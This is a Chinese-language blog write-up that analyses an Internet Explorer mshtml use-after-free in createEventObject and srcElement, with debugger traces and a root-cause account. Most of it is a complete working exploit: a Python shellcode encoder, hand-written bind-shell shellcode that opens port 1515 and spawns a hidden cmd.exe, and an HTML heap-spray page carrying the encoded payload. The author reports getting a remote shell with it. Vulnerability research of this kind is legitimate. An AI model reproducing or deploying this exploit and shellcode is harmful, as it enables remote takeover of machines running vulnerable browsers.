7e27e24d 8b4118 mov eax,dword ptr [ecx+18h]
7e27e250 85c0 test eax,eax
7e27e252 7511 jne mshtml!CEventObj::GetParam+0x19 (7e27e265)
7e27e254 8b4110 mov eax,dword ptr [ecx+10h]
7e27e257 8b805c050000 mov eax,dword ptr <Unloaded_ud.drv>+0x55b (0000055c)[eax]
7e27e25d 85c0 test eax,eax
7e27e25f 0f848f3c0c00 je mshtml!CEventObj::GetParam+0x22 (7e341ef4)
7e27e265 8b4d08 mov ecx,dword ptr [ebp+8]
7e27e268 8901 mov dword ptr [ecx],eax
7e27e26a 33c0 xor eax,eax
7e27e26c 5d pop ebp
7e27e26d c20400 ret 4
分析:
可以看出使用ecx调用数据,这大概是一个thiscall类型,ecx存储着一个对象指针。我门回到上面查看调用mshtml!CEventObj::GetParam之前ecx是什么。
![1567997414097[3]](https://img2018.cnblogs.com/blog/1748935/201910/1748935-20191022090150601-1207914596.png "1567997414097[3]")
可以看到是 mshtml!CEventObj::GenericGetElement 函数的 局部变量 [ebp-0ch]
![1567997585914[3]](https://img2018.cnblogs.com/blog/1748935/201910/1748935-20191022090151177-1794896316.png "1567997585914[3]")
可以看到 是 mshtml!CEventObj::GenericGetElement() 的 ecx 也就是 同一个对象参数。
2.4 查阅分析相关类和结构体
CEventObj 是一个event对象,但是并没有与event直接相关的属性。event直接相关的属性在 EVENTPARAM 结构中,一般来说 event 会有一个源元素(触发这个事件的元素节点),在event的srcElment 属性中即是对象,当调用CreateEventObject()创建事件event副本的时候,没有增加Element的引用计数,所以当释放原Element之后,事件副本eventcopy.CTreeNode是一个悬空指针,其下的Element元素内存已经被释放了。
使用查看相关IDA符号:
![1568040659884[3]](https://img2018.cnblogs.com/blog/1748935/201910/1748935-20191022090151882-1197550670.png "1568040659884[3]")
2.5 漏洞成因
综合上面的分析可以得出以下结论:
![1568039755993[3]](https://img2018.cnblogs.com/blog/1748935/201910/1748935-20191022090152682-497406364.png "1568039755993[3]")
createEventObject创建了event的副本,但是此函数中EVENTPARAM::EVENTPARAM() 复制EVENTPARAM结构时并没有增加CTreeNode中srcElement即原对象的访问计数。所以在原Element被清空的时候,也对该内存进行了释放,造成了event副本中的EVENTPARAM.CtreeNode成了悬空指针。当使用的时候,会依次调用mshtml!CEventObj::get_srcElement()、mshtml!CEventObj::GenericGetElement()、mshtml!CElement::GetDocPtr(),会使得访问已经释放的内存(我们可以有意使用这块内存触发堆喷条件)
![1568041707676[3]](https://img2018.cnblogs.com/blog/1748935/201910/1748935-20191022090153408-681955855.png "1568041707676[3]")
3.1 当释放Element的情况
在mshtml!CEventObj::get_srcElement()、mshtml!CEventObj::GenericGetElement()、mshtml!CElement::GetDocPtr()这三个函数下断点
![1568019136597[1]](https://img2018.cnblogs.com/blog/1748935/201910/1748935-20191022090154225-1708637813.png "1568019136597[1]")
分析:
我们一路跟下来可以看到此时 ecx = ebx = 0x0c0d0c0d是我们的滑板指令了。继续跟进去验证:
![1568019396984[1]](https://img2018.cnblogs.com/blog/1748935/201910/1748935-20191022090155063-840374680.png "1568019396984[1]")
分析:
如我们预计的一样,此时已经来到了我们的滑板了
3.2 当没有释放Element的情况
在脚本中注释掉,释放对象的语句:
![1568041109610[1]](https://img2018.cnblogs.com/blog/1748935/201910/1748935-20191022090155857-1592334597.png "1568041109610[1]")
运行:
![1568041028258[1]](https://img2018.cnblogs.com/blog/1748935/201910/1748935-20191022090156691-485744883.png "1568041028258[1]")
分析:
我们可以观察到这里CTreeNode的ECX和EBX恢复了正常
4.1 CShellCode 和 UnicodeShellCode的的转换
注意: 此脚本使用python2的环境,因为python3中没有 .encode('hex')
c_shellcode = ("CShellCode")
shellcode_list = []
for i in range(len(c_shellcode)):
shellcode_list.append(c_shellcode[i].encode('hex'))
js_shellcode = ''
for i in range(0, len(shellcode_list), 2):
if i == (len(shellcode_list) - 1):
element = '%u' + "00" + str(shellcode_list[i])
elif i == len(shellcode_list):
break
else:
element = '%u' + str(shellcode_list[i + 1]) + str(shellcode_list[i])
js_shellcode += element
print(js_shellcode)
4.2 shellcode的编写
这里使用的是vs2017 -32- release,写完后直接放xdbg里面扣取shellcode
int main()
{
__asm
{
pushad
sub esp,0x200
jmp Label_PC
//GetProcAddress
//cmd.exe
//ws2_32.dll
//kernel32.dll
//GetHashAV("ExitProcess")); // c69fa312
//GetHashAV("WSAStartup")); // 7b0168d4
//GetHashAV("WSASocketA")); // 5bbcf064
//GetHashAV("bind")); // c9bb4e20
//GetHashAV("listen")); // 1897a73e
//GetHashAV("accept")); // 62032e3d
//GetHashAV("CreateProcessA" // 92d74d79
//下面是 ff 亦或加密后的字符串
//cmd.exe -- 8 -- STD -d -b- 8-5 == 0x25
//ws2_32.dll --b -- SDT -d -b -5 == 0x1d
//kernel32.dll -- d -- STD - d-5 == 0x12
_asm _emit(0x63) _asm _emit(0x6D) _asm _emit(0x64) _asm _emit(0x2E) _asm _emit(0x65) _asm _emit(0x78) _asm _emit(0x65) _asm _emit(0x00)
_asm _emit(0x77) _asm _emit(0x73) _asm _emit(0x32) _asm _emit(0x5F) _asm _emit(0x33) _asm _emit(0x32) _asm _emit(0x2E) _asm _emit(0x64) _asm _emit(0x6C) _asm _emit(0x6C) _asm _emit(0x00)
_asm _emit(0x6b) _asm _emit(0x65) _asm _emit(0x72) _asm _emit(0x6E) _asm _emit(0x65) _asm _emit(0x6C) _asm _emit(0x33) _asm _emit(0x32) _asm _emit(0x2E) _asm _emit(0x64) _asm _emit(0x6C) _asm _emit(0x6C) _asm _emit(0x00)
Label_PC:
call Label_Start
Label_Start:
pop ebx //获取PC -- std_Offset_PC
mov [ebp-0x20],ebx
mov esi,fs:[0x30] //获取PEB
mov esi,[esi+0xc] //获取LDR
mov esi,[esi+0x1c]
mov esi,[esi] //获取下一个LDR
mov esi,[esi+0x8] //获取kernel32.dll的基地址
mov edx,esi
//通过Hash获取到LoadLibraryExA函数:
pushad
mov eax, 0xf81b065//提前算好的Hash值 -- LoadLibraryExA -- 因为LoadLibrary在kernelbase.dll里面没有,而不能确定当前使用的是Kernel32.dll还是KernelBase.dll所以使用通用的LoadLibraryExA
push eax//根据LoadLibrary的Hash值
push edx
call FUNC_GetFuncAddrByHash
mov [ebp-4],eax
test eax,eax
//如果获取到的地址是错误的
je Label_End
popad
// 获取 kernel32.dll的基址
mov edi, [ebp-0x4]
lea eax,[ebx-0x12]
push 0
push 0
push eax
call edi
mov [ebp-0xc],eax
//获取 ws2_32.dll
lea eax,[ebx -0x1d]
push 0
push 0
push eax
call edi
mov [ebp-0x10],eax
//通过hash 获取GetProcAddress
//push 0xb775fbf
//mov eax,[ebp-0xc]
//push eax
//call FUNC_GetFuncAddrByHash
//mov [ebp-0x8],eax
//开始创建网络环境
//GetHashAV("ExitProcess")); // 0xc69fa312
//GetHashAV("WSAStartup")); // 0x7b0168d4
//GetHashAV("WSASocketA")); // 0x5bbcf064
//GetHashAV("bind")); // 0xc9bb4e20
//GetHashAV("listen")); // 0x1897a73e
//GetHashAV("accept")); // 0x62032e3d
//GetHashAV("CreateProcessA" // 0x92d74d79
FUNC_PayLoad:
sub esp, 0x300
push 0x7b0168d4
mov eax, [ebp - 0x10]
push eax
call FUNC_GetFuncAddrByHash
lea esi, [esp]
push esi
push 0x0202
call eax//WSAStartup初始化网络环境
test eax, eax
jnz Label_End
//创建套接字 WSASocketA
push 0x5bbcf064
mov eax, [ebp - 0x10]
push eax
call FUNC_GetFuncAddrByHash
push 0
push 0
push 0
push 6
push 1
push 2
call eax
mov[ebp - 0x14], eax
//在本地绑定一个端口1515
push 0xc9bb4e20
mov eax, [ebp - 0x10]
push eax
call FUNC_GetFuncAddrByHash
mov word ptr[esp + 0x100], 0x02//AF_INTE
mov word ptr[esp + 0x102], 0xeb05 //端口1515
mov dword ptr[esp + 0x104], 0//INADDR_ANY
lea esi, [esp + 0x100]
push 0x14
push esi
push[ebp - 0x14]
call eax
test eax, eax
jnz Label_End
//监听连接listen
push 0x1897a73e
mov eax, [ebp - 0x10]
push eax
call FUNC_GetFuncAddrByHash
push 0x7fffffff
push[ebp - 0x14]
call eax
test eax, eax
jnz Label_End
//接收连接 accept
push 0x62032e3d
push[ebp - 0x10]
call FUNC_GetFuncAddrByHash
push 0
push 0
push[ebp - 0x14]
call eax
mov [ebp-0x18],eax
//创建一个CMD进程
push 0x92d74d79
push [ebp -0xc] //kernel32.dll
call FUNC_GetFuncAddrByHash
mov edx,eax
lea edi,[esp+0x270]
mov ecx,0x11
mov eax,0x00
cld
rep stosd
mov dword ptr[esp +0x270],0x00000044
mov dword ptr[esp +0x29c],0x00000101
mov word ptr[esp+0x2a0],0x0000 //WM_HIDE
mov esi,[ebp-0x18]
mov dword ptr[esp+0x2a8],esi
mov dword ptr[esp+0x2ac],esi
mov dword ptr[esp+0x2b0],esi
lea esi,[esp+0x270]
lea edi,[esp+0x100]
mov ebx,[ebp-0x20]
lea ebx,[ebx- 0x25]
push edi
push esi
push 0
push 0
push 0
push 1
push 0
push 0
push ebx
push 0
call edx
jmp Label_End
//通过Hash值 求函数地址 -- PARAM@1 ==M_BASE PARAM@2 == HASH
FUNC_GetFuncAddrByHash://===============================+
push ebp
mov ebp ,esp
sub esp,0x20
mov esi,[ebp+0x8]
mov ecx,[esi+0x3c]
add esi,ecx
mov esi,[esi+0x78]
//mov esi,[esi+0x168]//导出表的rva
add esi,[ebp+0x8]//导出表的va
mov [ebp-0x4],esi//导出表的基地址 -- var_4
mov ebx,[esi+0x20]//导出名称表的基地址rva
add ebx,[ebp+0x8] //导出名称表的VA
mov eax,[esi+0x18]//导出名称的个数
//hash 比对求函数地址
Loop_Body:
dec eax
jl F_Label_Nothing//说明遍历完了都没有找到
mov esi, [ebx + eax * 4]//获取名称的rva
add esi, [ebp + 0x8] //获取名称的VA
pushad//保存eax,防止被返回值修改
push esi
call Func_GetHash
mov edi,[ebp+0xc] //获取目标Hash数据
cmp eax,edi
popad
jne Loop_Body
//相等的话 ---- 开始寻找函数
mov esi,[ebp-0x4]
mov esi,[esi+0x24]//导出序号表的RVA
add esi,[ebp+0x8] //导出序号表的VA
xor ecx,ecx
mov cx,[esi+eax*2]//获取到了--序号
mov esi,[ebp-0x4] //导出结构体基址
mov esi,[esi+0x1c]//导出函数表的的RVA
add esi,[ebp +0x8]//函数地址表的VA
mov eax,[esi+ecx*4]//获取到了地址--目标RVA
add eax,[ebp+0x8] //获取到了目标地址的VA
jmp F_Label_End
F_Label_Nothing://遍历完都没有找到
xor eax,eax
F_Label_End://找到
mov edx,[ebp+0x8]
mov ebx,[ebp+0xc]//恢复前面两个参数的源数据
mov esp,ebp
pop ebp
ret 8
nop
nop
//获取字符串hash值的函数-- @PARAM1 -- 地址=================+
Func_GetHash:
push ebp
mov ebp,esp
sub esp,0x10
mov eax,0
mov esi,[ebp+0x8]
//mov esi,[ebp+0x8]
tag_Next:
xor ecx, ecx
mov cl, byte ptr[esi]
add eax,ecx
mov ecx,eax
shr ecx,7
shl eax, 25
or eax, ecx
//add eax, 0x01000000
inc esi
xor ecx, ecx
mov cl, byte ptr[esi]
test cl, cl
jne tag_Next
mov esp,ebp
pop ebp
ret 4
nop
nop
Label_End:
//popad
//根据hash求 ExitProcess的函数
push 0xc69fa312
push[ebp - 0xc]
call FUNC_GetFuncAddrByHash
push 0
call eax;
mov esp,ebp
pop ebp
}
//MessageBox(0, 0, 0, 0);
}
4.3 自定义js脚本,触发并实现堆喷
<html>
<head>
<script>
var shellcode = unescape("%u8b55%u53ec%u5756%u8160%u00ec%u0002%ueb00%u6320%u646d%u652e%u6578%u7700%u3273%u335f%u2e32%u6c64%u006c%u656b%u6e72%u6c65%u3233%u642e%u6c6c%ue800%u0000%u0000%u895b%ue05d%u8b64%u3035%u0000%u8b00%u0c76%u768b%u8b1c%u8b36%u0876%ud68b%ub860%ub065%u0f81%u5250%u73e8%u0001%u8900%ufc45%uc085%u840f%u01ff%u0000%u8b61%ufc7d%u438d%u6aee%u6a00%u5000%ud7ff%u4589%u8df4%ue343%u006a%u006a%uff50%u89d7%uf045%uec81%u0300%u0000%ud468%u0168%u8b7b%uf045%ue850%u0136%u0000%u348d%u5624%u0268%u0002%uff00%u85d0%u0fc0%uba85%u0001%u6800%uf064%u5bbc%u458b%u50f0%u15e8%u0001%u6a00%u6a00%u6a00%u6a00%u6a06%u6a01%uff02%u89d0%uec45%u2068%ubb4e%u8bc9%uf045%ue850%u00f6%u0000%uc766%u2484%u0100%u0000%u0002%uc766%u2484%u0102%u0000%ueb05%u84c7%u0424%u0001%u0000%u0000%u8d00%u24b4%u0100%u0000%u146a%uff56%uec75%ud0ff%uc085%u850f%u0157%u0000%u3e68%u97a7%u8b18%uf045%ue850%u00b2%u0000%uff68%uffff%uff7f%uec75%ud0ff%uc085%u850f%u0137%u0000%u3d68%u032e%uff62%uf075%u93e8%u0000%u6a00%u6a00%uff00%uec75%ud0ff%u4589%u68e8%u4d79%u92d7%u75ff%ue8f4%u007a%u0000%ud08b%ubc8d%u7024%u0002%ub900%u0011%u0000%u00b8%u0000%ufc00%uabf3%u84c7%u7024%u0002%u4400%u0000%uc700%u2484%u029c%u0000%u0101%u0000%uc766%u2484%u02a0%u0000%u0000%u758b%u89e8%u24b4%u02a8%u0000%ub489%uac24%u0002%u8900%u24b4%u02b0%u0000%ub48d%u7024%u0002%u8d00%u24bc%u0100%u0000%u5d8b%u8de0%udb5b%u5657%u006a%u006a%u006a%u016a%u006a%u006a%u6a53%uff00%ue9d2%u0097%u0000%u8b55%u83ec%u20ec%u758b%u8b08%u3c4e%uf103%u768b%u0378%u0875%u7589%u8bfc%u205e%u5d03%u8b08%u1846%u7c48%u8b35%u8334%u7503%u6008%ue856%u0038%u0000%u7d8b%u3b0c%u61c7%ue875%u758b%u8bfc%u2476%u7503%u3308%u66c9%u0c8b%u8b46%ufc75%u768b%u031c%u0875%u048b%u038e%u0845%u02eb%uc033%u558b%u8b08%u0c5d%ue58b%uc25d%u0008%u9090%u8b55%u83ec%u10ec%u00b8%u0000%u8b00%u0875%uc933%u0e8a%uc103%uc88b%ue9c1%uc107%u19e0%uc10b%u3346%u8ac9%u840e%u75c9%u8be7%u5de5%u04c2%u9000%u6890%ua312%uc69f%u75ff%ue8f4%uff5c%uffff%u006a%ud0ff%ue58b")
var Spliper=unescape("%u0c0d%u0c0d");
while(n.length<=0x10000)
Spliper+=Spliper;
Spliper=Spliper.substring(0,0x10000-shellcode.length);
var Spray=new Array();
for(var i=0;i<3000;i++)
{
Spray[i]=Spliper+shellcode;
}
var Objs = new Array();
for (i = 0; i < 200; i ++) {
Objs[i] = document.createElement ("COMMENT");
Objs[i].data = "abc";
};
var EventCopy = null;
function MyProc(evt)
{
EventCopy = document.createEventObject(evt);
document.getElementById ("SpanTst").innerHTML = "";
document.getElementById ("SpanTst").innerHTML = "";
document.getElementById ("SpanTst").innerHTML = "";
document.getElementById ("SpanTst").innerHTML = "";
window.setInterval (Trigger, 50);
}
function Trigger()
{
p = "u0c0du0c0du0c0du0c0du0c0du0c0du0c0du0c0du0c0du0c0du0c0du0c0du0c0du0c0du0c0du0c0du0c0du0c0du0c0du0c0du0c0du0c0du0c0du0c0du0c0du0c0du0c0du0c0du0c0du0c0du0c0du0c0du0c0du0c0du0c0du0c0du0c0du0c0du0c0du0c0du0c0du0c0d";
for (i = 0; i < Objs.length; i ++) {
Objs[i].data = p;
};
var Attack = EventCopy.srcElement;
}
</script>
</head>
<body>
<span id="SpanTst"><IMG SRC="test.gif" onload="MyProc(event)" width="16" height="16"></span>
</body>
</html>
4.4 验证远程连接反弹shell
使用OD附加IE并使用IE 访问服务器 ip/test.html:
![1568038011998[1]](https://img2018.cnblogs.com/blog/1748935/201910/1748935-20191022090158305-2038952827.png "1568038011998[1]")
到达触发点:
![1568038121270[1]](https://img2018.cnblogs.com/blog/1748935/201910/1748935-20191022090200034-1709259232.png "1568038121270[1]")
来到堆喷滑板指令:
![1568038192969[1]](https://img2018.cnblogs.com/blog/1748935/201910/1748935-20191022090201849-467410406.png "1568038192969[1]")
验证shellcode:
![1568038531254[1]](https://img2018.cnblogs.com/blog/1748935/201910/1748935-20191022090203716-2116225806.png "1568038531254[1]")
f9 继续运行,并使用物理机telnet虚拟机,成功反弹shell,并且在shellcode中使用exitprocess,增强隐蔽性:
![1568038640711[1]](https://img2018.cnblogs.com/blog/1748935/201910/1748935-20191022090205343-1850898650.png "1568038640711[1]")